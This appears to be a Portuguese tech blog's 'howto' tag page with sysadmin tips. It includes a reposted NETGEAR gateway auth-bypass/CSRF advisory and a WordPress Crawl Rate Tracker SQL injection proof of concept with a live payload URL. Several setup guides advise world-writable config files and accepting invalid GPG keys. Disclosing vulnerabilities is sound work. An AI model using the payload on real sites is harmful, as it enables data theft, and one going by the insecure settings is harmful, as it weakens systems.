Browsed by
Tag: howto

Blank Pages no WordPress, como sanar?

Blank Pages no WordPress, como sanar?

Passos para Sanar o Problema:

 

1 – Entre no WHM como root,

2 – Siga os menus e submenus (->)  Home (Início) -> Service Configuration -> PHP Configuration Editor,

3 – Localize o item Memory_Limit, esse deve possuir PELO MENOS 320mb (sim, há plugins pesados que consomem muita ram),

4 – Localize Upload_max_filesize, apesar de não influenciar aqui, no momento de uploads você pode se dar mal, deixe pelo menos 500MB (nossa hospedagem permite 2gb de upload),

5 – Localize Max_execution_time, deixe pelo menos 600s (para uploads longos ou processos de plugins será de suma importância ter execução longa),

6 – Localize Max_input_time e deixe pelo menos 300s.

 

De todos os pontos que citamos, os 2 principais para sanar o problema são MEMORY_LIMIT e Max_Execution_Time.

 

Fonte: http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/

Como extrair arquivos .RAR no CENTOS?

Como extrair arquivos .RAR no CENTOS?

É bem verdade que o CentOS tem tudo que o Red Hat tem + um grande apoio da comunidade, mas tente abrir um arquivo .rar via console para você ver o que é bom para tosse :P

Brincadeiras a parte, não é uma falha da distribuição em si, tampouco repositórios ruins, muito pelo contrário, como a idéia maior de compactação gira em torno de .zip, .tar, .tar.gz a maior parte das distribuições vêm dispostas a encarar facilmente tais formatos. Bem, se queremos abrir o .RAR no Centos teremos de fazer uma coisa, instalar o pacote de arquivos para trabalhar com formato .rar, “vamo simbora”?

Se o RedHat for 6 e for 64 bits rode como root:

rpm -Uhv http://apt.sw.be/redhat/el6/en/x86_64/rpmforge/RPMS/unrar-3.9.10-1.el6.rf.x86_64.rpm

Se precisar de outro rpm do unrar em detrimento de versões do centos ou mesmo por estar usando outra distribuição veja o link:

http://pkgs.org/centos-6-rhel-6/repoforge-x86_64/unrar-3.9.10-1.el6.rf.x86_64.rpm.html

Instalando este pacote há uma pequena lógica no comando, explico logo abaixo:

unrar e nomedoarquivo.rar

O comando acima extrai o arquivo na pasta atual onde ele está.

unrar l nomedoarquivo.rar

O comando acima lista o que tem dentro do arquivo compactado.

unrar t nomedoarquivo.rar

O comando acima checa a integridade do arquivo compactado.

Bom pessoALL, em resumo é isto ;).

Abraços e bom trabalho + final de semana show de bola!

Como adicionar uma flag no grub sem problemas no CentOS, Fedora ou RedHat?

Como adicionar uma flag no grub sem problemas no CentOS, Fedora ou RedHat?

Use of uninitialized value in string ne at /usr/sbin/ddclient line 1973.

Use of uninitialized value in string ne at /usr/sbin/ddclient line 1973.

Se você está usando DEBIAN-BASED (mind/debian/ubuntu) e toda vez que roda o comando ddclient ele apresenta erro SEUS PROBLEMAS “SE ACABARAM-SE”!

Para sanar, como root faça o seguinte:

rm -rf /var/cache/ddclient/ddclient.cache

Depois rode o comando ddclient, a saída vai ser algo semelhante a:
SUCCESS:  updating SEUHOST.ALGUMACOISAg: good: IP address set to IPDASUAINTERFACEWEB

 

Abraços galera

Como remover animações de novas janelas no Mac Os X Lion

Como remover animações de novas janelas no Mac Os X Lion

Atenção galera do bem, mais uma dica simples e rápida e de última hora ;P, se você está afim de desativar animações das novas janelas no seu maczão faça o seguinte, abra o terminal (vide abaixo):

abrir terminal UNIX no mac
abrir terminal UNIX no mac

Dentro dele use o seguinte comando

Pronto, depois disso é só alegria :P.

Bye bye!

Se quiser voltar como antes digite:

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

Como instalar Apache 2, Mysql 5 e php 5 no Mac Os X LION 10.7.x (testado 10.7.1)

Este artigo vai parecer muito com a instalação do apache, php e mysql sob mac os x snow leopard, porém existem algumas particularidades que precisam ser detalhadas. Antemão parte do artigo do mamp sob snow leopard será copiado, depois, iremos detalhar pontos MUITO importantes para que tudo funcione corretamente. Estamos testando em um hackintosh LION (10.7.1), literalmente current (updates mais novas).

Vamos lá:

No outro artigo, para habilitarmos o apache usamos o comando com poder de root (sudo) para ativar o web server, mas agora isto só é permitido sem stress via Preferências do Sistema -> Sharing (compartilhamento) e marcando o Web Server (compartilhamento de arquivos web), lhe mostraremos imagens abaixo:

Abrindo o menu de sharing para apache
Abrindo o menu de sharing para apache
Clicando em compartilhamento de páginas web
Clicando em compartilhamento de páginas web

Note acima que clicamos em COMPARTILHAMENTO junto as preferências de sistema e em seguida marcamos o compartilhamento do apache (páginas web). Toda mudança significativa do mac faz controle de permissões (segurança), por isso coloque seu login e senha para autorizar a mudança.

Feito isto teremos de entrar no conf do apache para liberarmos o php5, veja os passos que diremos.

Nosso segundo ponto e muito importante é entrar no arquivo de configuração do apache 2 afim de habilitarmos o suporte ao PHP, vamos por a mão na massa? Estamos usando o VIM, um editor muito eficaz e leve (todos que já amaram o vi um dia com certeza amam/amarão o vim):

Little-oaks-appunixlabs:~ sudo vim /etc/apache2/httpd.conf

 

Dentro deste arquivo devemos remover o comentário da linha abaixo:

LoadModule php5_module libexec/apache2/libphp5.so

Recomendo que aperte a tecla / no vim e digite php5, você já vai cair em cima da linha a ser descomentada, em seguida, no sinal de libra (#), caminhe até ele e aperte x
Isto nos deixará com suporte ao PHP, depois basta apertar ESC e digitar isto:
:wq!
Assim que pressionar ENTER o arquivo será salvo.
Vamos explicar o por que de :wq!

: representa comando para o arquivo
W representa ESCREVER
Q representa QUIT (sair)
! representa EXECUTAR as instruções informadas

Para finalizarmos o suporte ao php precisamos rodar o seguinte comando:

Little-oaks-appunixlabs:~ sudo apachectl restart

É mania de todos criar um arquivo com a função phpinfo() contida nele, porém, se fizermos isso “de cara” o apache vai exibir muitos warnings (interpretados pelo php) por questões de permissões e de existência do arquivo php.ini. Para sanarmos isto deveremos fazer o seguinte:

Little-oaks-appunixlabs:~ cd /etc
Little-oaks-appunixlabs: sudo cp php.ini.default php.ini
Little-oaks-appunixlabs: sudo chmod 666 php.ini

Estamos copiando o php.ini default do /etc (área de arquivos de configurações em Unix-like systems) e atribuindo permissões 666 (dono pode ler e escrever no arquivo, grupo também e demais também).
No arquivo php.ini temos de localizar o trecho aonde o TimeZone é identificado (mas está comentado). É muito importante mudar esta linha e ajustarmos nosso timezone corretamente, pois isto nos dará um horário adequado. Para isto devemos proceder da seguinte forma:
Little-oaks-appunixlabs: sudo vim php.ini
Em seguida aperte a tecla / para localizar um termo, informe o seguinte date.timezone, isto lhe deixará na linha acima da que precisamos mudar. Descomente a linha abaixo para que fique assim:
date.timezone =

Você removerá o ; apertando x em cima dele. Para deixarmos o vim em modo de edição de arquivos precisamos apertar a tecla i, isto nos dará poder de editar o arquivo (saindo de modo comando).
Agora iremos colocar depois do = o seguinte:
America/Sao_Paulo
Então o resultado final será —> date.timezone = America/Sao_Paulo
Dê ESC e digite
:wq!
Aperte ENTER e terá o arquivo salvo.

 

As vezes você pode estar se perguntando:

Poxa, mas meu timezone não tem nada a ver com o de Sampa, o que faço?
Relaxa, rapá! A galera do Appunix pensou em você! Abaixo segue a lista de timezone da América:
http://www.php.net/manual/en/timezones.america.php

Se mesmo assim não lhe agradar você pode usar os globais:
http://www.php.net/manual/en/timezones.others.php

Mas é impossível você não se agradar dos timezones da América, são repletos.
Os mais comuns que são usados são:
America/Porto_Velho
America/Noronha
America/Rio_Branco
America/Recife
America/Sao_Paulo
America/Porto_Acre
Mas escolha o que mais lhe agradar.

Assim que decidir qual seu TimeZone você deve reiniciar o apache para reler o php.ini e ativar o negócio:
Little-oaks-appunixlabs: sudo apachectl restart

Agora precisamos instalar o Mysql 5 para que possa trabalhar da forma que almejamos.
Para irmos direto ao ponto acesse o link abaixo:
http://dev.mysql.com/downloads/mysql/5.1.html#macosx-dmg
Se cuide para baixar a versão ideal para você.
Aí é 64 bits? Não sabe como é? Quer saber como seu Mac Os X LION está operando? Clique na maça, depois clique em Sobre Este MAC, em seguida clique em Software (Categoria) e procure pela linha Kernel de 64-bit e Extensões: Sim (conforme a foto abaixo):

como ver informações do seu mac os x
como ver informações do seu mac os x

Caso seja Sim é 64 bits (x86_64), então baixe o pacote para 64 bits.
Vamos simbora?
Baixe o arquivo x86_64 no formato DMG.

baixar pacote mysql 64 bits (DMG)
baixar pacote mysql 64 bits (DMG)

baixar pacote mysql 64 bits (DMG)

Quando você clicar no formato DMG automaticamente o site da Mysql vai te convidar a logar-se lá com eles, mas basta prestar a atenção (conforme imagens abaixo) para não precisar perder tempo com esta burocracia, se você quer baixar direto (melhor Né?) basta fazer o seguinte, clique no link abaixo:
HTTP://dev.mysql.com/get/Downloads/MySQL-5.1/mysql-5.1.58-osx10.6-x86.dmg/form/http://mysql.cce.usp.br/
Deixa o download terminar siga os passos das fotos abaixo (literalmente instalar o mysql e seu ícone), Devemos concluir os passos extras para adição do Mysql como sendo parte do painel administrativo, para isto siga os passos abaixo:

passo1
passo1

 




















Temos de focar em um ponto em comum.

Temos um script na pasta de download que abrimos (do MYSQL).
Veja o seguinte, MYSQL.PREFPANE é um script que serve para adicionar o script (ícone) de inicialização do MYSQL dentro das preferências do sistema, por isso DEVEMOS executar ele sim, autorizando-o com a senha do usuário. (sem isso teremos de inicializar na mão com o comando mysqld (VIXE, mac é praticidade RAPÁ!)






Feito isto iremos confirmar se o mysql está rodando com o seguinte comando (dentro do terminal):

Little-oaks-appunixlabs: /usr/local/mysql/bin/mysql –user=little_oak

Substitua little_oak por SEU_USUÁRIO.

Isto fará com que você esteja dentro do mysql (Via terminal).

Veja como abrir o terminal:

Façamos o seguinte, clique em terminal (veja a imagem abaixo):

como abrir terminais no mac os x
como abrir terminais no mac os x

como abrir terminais no mac os x

Feito isto iremos reiniciar o apache 2 para garantir que o nosso servidor está integrando literalmente tudo, faremos com o seguinte comando:

Little-oaks-appunixlabs: sudo apachectl restart

Para conferirmos tudo vamos entrar dentro da nossa pasta pessoal, na pasta Sites e criar um arquivo chamado index.php. Dentro dele iremos colocar o seguinte (ISTO EM /Library/WebServer/Documents):
Ou seja -> sudo vim /Library/WebServer/Documents/index.php

< ?php phpinfo(); ?>

 

Quando citamos a parte do mysql, praticamente contorna a viagem de redefinir a senha de root. Se dermos ouvidos ao Mágico de OZ e inventarmos redefinir senhas vamos brincar com isso ó:

Mac-Pro-de-little-oak:etc little_oak$ sudo /usr/local/mysql/bin/mysqld –skip-grant-tables –user=root

grant all…

flush privileges e talz, NÃO PRECISA DISSO, o mac entende que você é um cara que é punk no sistema, que só dá sudo quando sabe o que tá fazendo.

Para conferir como alterar a senha de root do mysql basta clicar no nosso artigo de como redefinir a senha de root no mysql dentro do mac os x lion sem complicações.

PONTO EXTRA:

Como a galera está falando muito de MCRYPT no Mac Os X Lion, o path padrão dele é /usr/share/file/magic/mcrypt
, se quiser descomente a linha do mcrypt no php.ini e mande ficha.

 

Uma coisa massa, se você quer ver a documentação do apache meta bala em http://localhost/manual/, veja a imagem abaixo:

 

manual do apache
manual do apache

 

Se você curtiu esse post dê share :P

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF


Sense of Security - Security Advisory - SOS-11-011

Release Date. 20-Sep-2011
Last Update. -
Vendor Notification Date. 22-Mar-2011
Product. NETGEAR Wireless Cable Modem Gateway
CG814WG
Affected versions. Hardware 1.03,
Software V3.9.26 R14 verified,
possibly others
Severity Rating. High
Impact. Authentication bypass,
Cross Site Request Forgery
Attack Vector. Remote without authentication
Solution Status. Upgrade to R15 (by contacting NETGEAR)
CVE reference. Not yet assigned

Details.
The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP's
as customer premises equipment within Australia and abroad. It is a
centrally managed ISP solution whereby each ISP's devices run a
customised firmware and configuration changes and updates can be pushed
out as required.

Basic authentication is used as the primary and only authentication
mechanism for the administrator interface on the device. The basic
authentication can be bypassed by sending a valid POST request to the
device without sending any authentication header. The response from the
device sends the user to another page that requests basic
authentication, however at this point the request has already been
processed.

An example of attacks using the basic authentication bypass may include
changing the admin password or enabling the remote admin interface
(Internet facing).

Additionally, due to the lack of CSRF protection in the web application,
the bypass attack can be coupled with CSRF to have a victim enable the
remote admin interface to the Internet, where an attacker can then use
the bypass attack again across the remote admin interface to reset the
admin password and access the device. This attack is possible when
targeting a victim that is behind the NETGEAR device on the same segment
as the web administrator interface whom has browsed to a malicious site
containing the CSRF attack.

NETGEAR was notified of this vulnerability on 22 March 2011, but we
never received a response or acknowledgement of the issue or fix. Sense
of Security notified local ISP's and it was escalated by a local ISP
who worked with NETGEAR to develop and test an update. Sense of Security
was never provided an opportunity to validate the fixes in the latest
firmware version. Given the severity of the issue it would be prudent
for NETGEAR to notify and supply an update to all of its customers.

Proof of Concept.
By embedding the below HTML in a website and having a
victim browse to the website the remote management interface to the
Internet would be enabled. An attacker could then use one of the
hardcoded passwords for the device to access it, or use a basic
authentication bypass to change the admin password. Alternatively, the
attacker could conduct a CSRF attack that implements two POST requests
to have the remote admin interface enabled, and the admin password
changed.

The example here is a basic proof of concept, more complex examples
which include JavaScript redirects to mask the basic authentication
pop-up would be more stealthy.








Solution.
Ask your ISP to obtain the latest firmware from NETGEAR and deploy it
to your device.

Discovered by.
Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: [email protected]
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-011.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17874/

WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability

WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability


# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(visit_time)) visit_date,robot_name,COUNT(*) total FROM $this->sbtracking_table WHERE visit_time >= '$start' AND visit_time < = '$end' AND page_url = ‘” . $_GET[‘page_url’] . “‘ GROUP BY visit_date,robot_name“);

if ($_GET[‘chart_data’]==1) {

$chartData = new b3_chartData();
echo $chartData->tracking_bot_report_chart_data();

Fonte: http://www.exploit-db.com/exploits/17755/

Como instalar android 2.3 milestone 2 (passo a passo)

Como instalar android 2.3 milestone 2 (passo a passo)

Tutorial Gingerbread 2.3.4 no Milestone 2 “MS2GingerBeta5 RC1” Atualizado 24/08/11

 

PARA acompanhar o artigo completo e mais atualizado sobre atualização do android milestone 2 rodando gingerbread 2.3.7 clique em ->

https://www.appunix.com.br/howto/linux/como-instalar-android-2-3-7-no-milestone-2-sem-perder-dados-e-de-forma-rapida/

Nessa versão alguns bugs foram resolvidos o principal foi o teclado físico que agora podemos utilizar as letras e números normalmente, a ROM em si esta mais rápida e estável só alguns bugs ainda continuam o principal é o problema de não podemos adicionar novas contas além do Google e do Motoblur, fora isso estou gostando muito dessa rom, vamos ao tutorial:

Temos que rootear o aparelho primeiro com o Gingerbreak  (se você já tem root em seu telefone pule esse passo) para fazer ele funcionar vá em “configurações”, “aplicativos”, “desenvolvimento” e ative a “depuração de usb” agora instale o Gingerbreak e aperte em root device após isso o celular ira reiniciar rooteado.

Agora temos que baixar os seguintes arquivos MS2GingerBeta5 RC1,sensorsMS2patchMilestone2SenorandKeyboardCWM2-bootstrap,Milestone2patchforMS2Ginger.zip e ms2patchcwm2.zip.

Agora devemos instalar no aparelho os seguintes aplicativos Clockworkmod e Droid 2 Recovery Bootstrap.

Com os arquivos baixados devemos descompactar somente o arquivo MS2GingerBeta5 RC1, passe para a pasta clockworkmod/backup (se não tiver crie as pastas) do seu cartão de memoria somente a pasta MS2GingerBeta5 RC1 que se encontra na pasta Nanodroid do arquivo MS2GingerBeta5 RC1.

Devemos também descompactar a pasta Milestone2-fixsbf esse arquivo vai ser usado mais para frente.
Agora devemos colocar na pasta clockworkmod/updates os seguintes arquivos sensorsMS2patch, Milestone2SenorandKeyboardCWM2-bootstrap, Milestone2patchforMS2Ginger.zip e ms2patchcwm2.zip, lembrando de não descompactar esses arquivos.
Agora entre no aplicativo Droid2RecoveryBootstrap e aperte Bootstrap recovery depois em permitir e por ultimo Reboot Recovery.
O celular reiniciará, agora com os botões de volumes podemos ir para cima ou para baixo nesse menu e o botão da câmera serve para dar ok, agora vamos selecionar “Backup and Restore”, depois “Restore” e selecione “MS2GingerBeta5 RC1” depois de acabar de restaurar devemos ir em “install zip from sdcard” e depois selecionar “choose zip from sdcard” e navegar até /sdcard/clockworkmod/updates/ms2patchcwm2.zip e confirma a instalação.Agora faça o mesmo caminho e escolha os arquivos Milestone2SenorandKeyboardCWM2

-bootstrap, Milestone2patchforMS2Ginger.zip e sensorsMS2patch depois aperte em “reboot”. Atenção é muito importante não esquecer de nenhum dos arquivos.Agora devemos instalar o Rsd Lite em nosso computador para colocar o fixed_sbf_newleak.SBF em seu celular.

Após selecionar arquivo por arquivo e dar “reboot” pode aparecer uma tela preta se aparecer tire a bateria e coloque novamente, ligue novamente o celular segurando o botão “Power”(o botão de ligar) e a “seta para cima” do teclado depois de entrar na tela de bootload conecte o celular no PC, agora no PC entre no Rsd Lite esperar o Windows encontrados os drives do celular e aperte em “…”  escolha o arquivo descompactado da pasta Milestone2-fixsbf ( o fixed_sbf_newleak.SBF) após isso basta apertar em “start” e esperar aparecer “finish”.

O celular irá reiniciar normalmente e funcionando, lembrando que pode demorar até 10 minutos para reiniciar o telefone.

Aproveite que esta versão esta muito funcional e a duração da bateria esta bem  melhor comparada com a “MS2GingerBeta5”.

Atualização para quem o sensor de movimento não esta funcionando temos que fazer alguns passos a mais, primeiro temos que baixar o Bootmenu v0.8.6-v2.zip e colocar na pasta clockworkmod/updates, entre no aplicativo Droid2RecoveryBootstrap e aperte Bootstrap recovery depois em permitir e por ultimo Reboot Recovery.

Na tela de boot devemos ir em “install zip from sdcard” e depois selecionar “choose zip from sdcard” e navegar até /sdcard/clockworkmod/updates/Bootmenu v0.8.6-v2.zip e confirma a instalação e aperte em reboot.

O celular irá reiniciar em uma nova tela de boot nessa tela a tecla de dar ok é o “power” selecione “boot” e depois “set default: [boot Menu]” e escolha “normal” agora aperte em “Go back” 2 vezes e depois “Recovery” e “custom recovery”.

Agora na nova tela de boot o “ok” é o botão da câmera, no menu aperte em “install zip from sdcard” e depois selecionar “choose zip from sdcard” e navegar até /sdcard/clockworkmod/updates/sensorsMS2patch e confirme a instalação após isso aperte em “reboot system now” o celular reiniciará sozinho, pode demorar um pouco mais basta esperar e curti seu celular com o sensor de movimento funcionando.

Créditos ao amigo Marcos Gonçalves

http://ajudandroid.blogspot.com/2011/08/tutorial-gingerbread-234-no-milestone-2.html?showComment=1314471600595#c3813666722992208249


Luis Fernando

Grupo Android Brasil
http://groups.google.com/group/androidbrasil?hl=pt-BR

 

Broadcom Corporation BCM43225 802.11b/g/n no OpenSuse 11.4 (Acer 7745)

Broadcom Corporation BCM43225 802.11b/g/n no OpenSuse 11.4 (Acer 7745)

Antes de mais nada quero agradecer a Deus por estar usando este notebook, pois, sinceramente acho punk demais programar em monitores de alta resolução (1600×900).
Outro ponto importante para este artigo é que estou encantado com o nível de estabilidade do OpenSuse 11.4 neste notebook, que desde já deixo claro no mini overview que:

1 – Placa de rede está operando com eficiência (sim, pacotes sendo enviados usando GB),
2 – Som do Notebook alto pra caramba (e com qualidade),
3 – Brilho do monitor MUITO bem trabalhado (lembram do esquema de brilhos no ubuntu e mint, que o pau comeu pro nosso lado? https://www.appunix.com.br/howto/linux/resolvendo-problema-de-brilho-ubuntu-10-04-10-10-11-04-e-linux-mint-9-e-10-julia/),
4 – Reconhecimento de memória ram foi MUITO interessante (vide:

appunix-labs:~ # uname -a

Linux appunix-labs.site 2.6.37.6-0.5-desktop #1 SMP PREEMPT 2011-04-25 21:48:33 +0200 i686 i686 i386 GNU/Linux

appunix-labs:~ # free -m
total used free shared buffers cached
Mem: 3639 1118 2521 0 45 726
-/+ buffers/cache: 346 3293
Swap: 2058 0 2058

appunix-labs:~ #
)

5 – Repositórios para quem usa Velox estão muito rápidos (1 mb de link compartilhado aqui no labs, avephoenix… :( ).

No mais o sistema em si é um tesão, Gnome 2.x, LibreOffice e etc.

Segue um lspci do Hardware testado:

00:00.0 Host bridge: Intel Corporation Core Processor DRAM Controller (rev 12)
00:02.0 VGA compatible controller: Intel Corporation Core Processor Integrated Graphics Controller (rev 12)
00:16.0 Communication controller: Intel Corporation 5 Series/3400 Series Chipset HECI Controller (rev 06)
00:1a.0 USB Controller: Intel Corporation 5 Series/3400 Series Chipset USB2 Enhanced Host Controller (rev 06)
00:1b.0 Audio device: Intel Corporation 5 Series/3400 Series Chipset High Definition Audio (rev 06)
00:1c.0 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 1 (rev 06)
00:1c.5 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 6 (rev 06)
00:1d.0 USB Controller: Intel Corporation 5 Series/3400 Series Chipset USB2 Enhanced Host Controller (rev 06)
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev a6)
00:1f.0 ISA bridge: Intel Corporation Mobile 5 Series Chipset LPC Interface Controller (rev 06)
00:1f.2 SATA controller: Intel Corporation 5 Series/3400 Series Chipset 4 port SATA AHCI Controller (rev 06)
00:1f.3 SMBus: Intel Corporation 5 Series/3400 Series Chipset SMBus Controller (rev 06)
00:1f.6 Signal processing controller: Intel Corporation 5 Series/3400 Series Chipset Thermal Subsystem (rev 06)
02:00.0 Ethernet controller: Atheros Communications AR8151 v1.0 Gigabit Ethernet (rev c0)
09:00.0 Network controller: Broadcom Corporation BCM43225 802.11b/g/n (rev 01)
ff:00.0 Host bridge: Intel Corporation Core Processor QuickPath Architecture Generic Non-core Registers (rev 02)
ff:00.1 Host bridge: Intel Corporation Core Processor QuickPath Architecture System Address Decoder (rev 02)
ff:02.0 Host bridge: Intel Corporation Core Processor QPI Link 0 (rev 02)
ff:02.1 Host bridge: Intel Corporation Core Processor QPI Physical 0 (rev 02)
ff:02.2 Host bridge: Intel Corporation Core Processor Reserved (rev 02)
ff:02.3 Host bridge: Intel Corporation Core Processor Reserved (rev 02)

Pronto, vamos meter o pau e resolver logo essa parada com a velocidade do dragão?

Em primeiros passos DEVEMOS habilitar alguns repositórios que por default (mantidos pela comunidade) não estão ativos, porém, para que tudo funfe ok precisam estar instalados. Primeiro devemos abrir o YAST2 (Meu computador -> SISTEMA -> YAST), devemos seguir exatamente conforme a tela abaixo, para clicar nos repositórios afim de localizarmos o trecho para add repositórios:

Yast2
Yast2

Pronto, feito isto devemos selecionar os repositórios principais, mas para isso iremos avançar menu por menu até chegar na hora fatal :P, veja as imagens abaixo:

clicar em adicionar OPENSUSE
clicar em adicionar OPENSUSE

Veja que, conforme o print, na tela, devemos clicar em ADICIONAR afim de que adicionemos repositórios pelo gestor, veja a imagem abaixo que mostra a tela seguinte:

Escolher Repositórios da COMUNIDADE
Escolher Repositórios da COMUNIDADE

Assim que clicarmos em adicionar nos será dado um leque de opções, devemos escolher adicionar um repositório da comunidade, que como podem ver marcamos Mozilla Beta, Packman (sem este não conseguiremos colocar a Wifi para  moer), Mozilla e o Contrib, veja os prints seguintes:

Processando Escolha da comunidade
Processando Escolha da comunidade
Listas de Repositórios disponíveis
Listas de Repositórios disponíveis
Terminando Marcações de Repositórios
Terminando Marcações de Repositórios

 

Depois disto, quando clicarmos em OK o sistema vai processar nossas escolhas, porém, ele reclamará de chaves não válidas, devemos ignorar tais mensagens aceitando tais chaves gpg, veja a imagem abaixo:

Importar Chaves Problemáticas
Importar Chaves Problemáticas

 

Estamos perto da glória e neste instante não vamos perder o fôlego, antes devemos receber uma notificação do que foi mudado, veja nosso print:

Status de Mudanças Realizadas
Status de Mudanças Realizadas

 

Agora é hora de console :P

Devemos impor as mãos e meter o pau no negócio, vamo que vamo?

Devemos rodar todos os comandos abaixo como ROOT afim de nem perdermos tempo com autorizações, para isto digite su – e coloque a senha do sistema para ganhar direitos globais como root e use os seguintes comandos abaixo:

appunix-labs:~ # lsmod | grep “b43\|ssb\|wl”
appunix-labs:~ # rmmod b43
appunix-labs:~ # rmmod ssb
appunix-labs:~ # zypper remove b43-fwcutter
appunix-labs:~ # echo “blacklist ssb” >> /etc/modprobe.d/50-blacklist.conf
appunix-labs:~ # echo “blacklist bcm43xx” >> /etc/modprobe.d/50-blacklist.conf
appunix-labs:~ # echo “blacklist b43” >> /etc/modprobe.d/50-blacklist.conf
appunix-labs:~ # echo “blacklist ndiswrapper” >> /etc/modprobe.d/50-blacklist.conf
appunix-labs:~ # zypper in broadcom-wl broadcom-wl-kmp-desktop
appunix-labs:~ # modprobe wl

 

Por fim dê um reboot:

appunix-labs:~ # reboot

 

Assim que seu S.O. voltar você deverá apertar FN + F3 para habilitar sua WIFI, dando tudo ok o resultado deve ser parecido com a foto abaixo:

wifi no opensuse
wifi no opensuse

 

Rolou ok aí?

Se ficar uma mini gamb de não aceitar sua WIFI pass, faça o seguinte, reinicie o pc, DESCONECTE qualquer cabo de rede e tente conectar-se via WIFI.

Rolou ok agora?

Tudo certinho?

Curtiu?

Use uma tática chamada SHARE, compartilhe.
Quer agradecer?
Comenta aí!
AppUnix agradece sua visita -> ENJOY!